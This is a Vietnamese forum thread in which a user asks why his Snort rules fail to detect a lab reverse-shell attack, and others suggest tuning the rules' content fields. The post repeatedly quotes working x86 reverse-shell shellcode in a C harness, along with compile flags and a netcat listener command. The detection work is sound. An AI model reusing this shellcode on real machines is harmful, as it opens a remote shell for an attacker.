Write rule snort error

[nguyenblack]

Đặc điểm là chỉ có 1 lần bắt tay 3 bước TCP. Nên em viết rule thế này:
alert any any -> any any (msg:"Test";ack:1;classtype:shellcode-detect;sid;1000001;rev:1
và
alert any any -> any any (msg:"test2";flags:S;flow:to_server,established;detecion_filter:track by_src, count: 5,sencond 5; classtype:shellcode-detect;sid:1000002;rev:1
Nhưng không hiểu sao cả 2 rule đều không hoạt động. Anh em nào biết thì giải thích mình với . Cảm ơn ạ

mình sử dụng shellcode:
#include <stdio.h>
#include <string.h>

char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85" // <— địa chỉ IP máy attacker
"\x66\x68"
"\x82\x35" // <— port 33333
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(int argc,char **argv) {
int(*func)();
func=(int(*)())code;
(int)(*func)();
}
ví dụ mình lưu tên file là shellcode.c
chạy lệnh : gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
cả máy victim và attacker đều sử dụng kali linux hết.
khi chạy lệnh trên thì ta được 1 file shellcode. Copy file này để bên victim.
bên attack chạy lệnh : nc -lvp 33333 ( lắng nghe port 33333)
bên máy victim chạy : ./shellcode ( chạy file shellcode vừa tạo )
khi chạy xong thì máy attacker mở kết nối tới victim.
Anh/em nào cho mình biết rule snort để phát hiện cuộc tấn công shellcode này với nhé. Mình mò hơn 2 tuần rồi. Cảm ơn mọi người

 

View attachment 2472
Đặc điểm là chỉ có 1 lần bắt tay 3 bước TCP. Nên em viết rule thế này:
alert any any -> any any (msg:"Test";ack:1;classtype:shellcode-detect;sid;1000001;rev:1
và
alert any any -> any any (msg:"test2";flags:S;flow:to_server,established;detecion_filter:track by_src, count: 5,sencond 5; classtype:shellcode-detect;sid:1000002;rev:1
Nhưng không hiểu sao cả 2 rule đều không hoạt động. Anh em nào biết thì giải thích mình với . Cảm ơn ạ

mình sử dụng shellcode:
#include <stdio.h>
#include <string.h>

char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85" // <— địa chỉ IP máy attacker
"\x66\x68"
"\x82\x35" // <— port 33333
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(int argc,char **argv) {
int(*func)();
func=(int(*)())code;
(int)(*func)();
}
ví dụ mình lưu tên file là shellcode.c
chạy lệnh : gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
cả máy victim và attacker đều sử dụng kali linux hết.
khi chạy lệnh trên thì ta được 1 file shellcode. Copy file này để bên victim.
bên attack chạy lệnh : nc -lvp 33333 ( lắng nghe port 33333)
bên máy victim chạy : ./shellcode ( chạy file shellcode vừa tạo )
khi chạy xong thì máy attacker mở kết nối tới victim.
Anh/em nào cho mình biết rule snort để phát hiện cuộc tấn công shellcode này với nhé. Mình mò hơn 2 tuần rồi. Cảm ơn mọi người

Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw

 

View attachment 2472
Đặc điểm là chỉ có 1 lần bắt tay 3 bước TCP. Nên em viết rule thế này:
alert any any -> any any (msg:"Test";ack:1;classtype:shellcode-detect;sid;1000001;rev:1
và
alert any any -> any any (msg:"test2";flags:S;flow:to_server,established;detecion_filter:track by_src, count: 5,sencond 5; classtype:shellcode-detect;sid:1000002;rev:1
Nhưng không hiểu sao cả 2 rule đều không hoạt động. Anh em nào biết thì giải thích mình với . Cảm ơn ạ

Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw

Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw

Bạn có thể tham khảo link dưới đây: Snort detect shellcode
Mình thì ko rành cái vụ shellcode này lắm nhưng về cơ bản là snort detect dựa trên các kí tự trong shell code được gửi đi thôi, tương tự ufw

hic ~ mình dùng rồi nhưng ko đc

 

Bạn đã dùng như thế nào ?

 

thì mình lấy rule ở link đó . xong bật cho nó chạy nhưng khi mình thực hiện tấn công thì nó ko cảnh báo gì cả

 

thì mình lấy rule ở link đó . xong bật cho nó chạy nhưng khi mình thực hiện tấn công thì nó ko cảnh báo gì cả

Bạn lấy rule mà bạn không thay shellcode vào thì đâu biết nó có chắc chắn detect được hay ko. @@
Ví dụ:

alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE sparc setuid 0"; content:"|82 10| |17 91 D0| |08|"; reference:arachnids,282; classtype:system-call-detect; sid:647; rev:6

phần content bạn nên xem thử đoạn payload của bạn phần nào quan trọng thì thay thế vào phần content. Bạn nên xem kỹ lại cái payload charcode, payload đó bạn copy trên mạng. phần IP với port bạn cũng để nguyên, xem thử lại bạn đã chạy đúng cách chưa nữa nhé.